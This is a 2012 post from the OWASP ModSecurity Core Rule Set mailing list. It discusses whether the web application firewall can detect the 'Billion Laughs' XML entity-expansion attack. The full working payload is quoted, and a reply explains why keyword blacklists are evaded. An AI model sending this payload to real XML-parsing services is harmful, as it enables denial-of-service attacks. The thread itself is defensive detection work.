hmm, what should modsec do here? Using a blacklist for lol, then the attacker replaces lol by lulz ;-)
This is completely valid XML syntax. I guess it is not simply detectable as attack, just think about this example: <?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;"> <!ENTITY lol2 "&lol;"> <!ENTITY lol3 "&lol1;&lol2;"> <!ENTITY lol4 "&lol2;&lol3;"> .... ]><lolz>&lol9;</lolz> You need a sophisticated XML-parser for that. If an application is that stupid that it accepts such user suplied XML, you better disconnect it from network rather than trying to hot patch it, IMHO. Just my 2 pence, Achim Am 20.10.2012 22:42, schrieb Tzury Bar Yochay: > Hi, > > I just came across this Wikipedia article called Billion Laughs > http://en.wikipedia.org/wiki/Billion_laughs and wonder if anyone ever > tested modsec XML parsing against that one > > The vector is > > <?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> > <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> > <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> > <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> > <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> > <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> > <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> > <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> > <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> > <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> > ]><lolz>&lol9;</lolz> _______________________________________________ Owasp-modsecurity-core-rule-set mailing list Owasp-modsecurity-core-rule-set@lists.owasp.org https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set
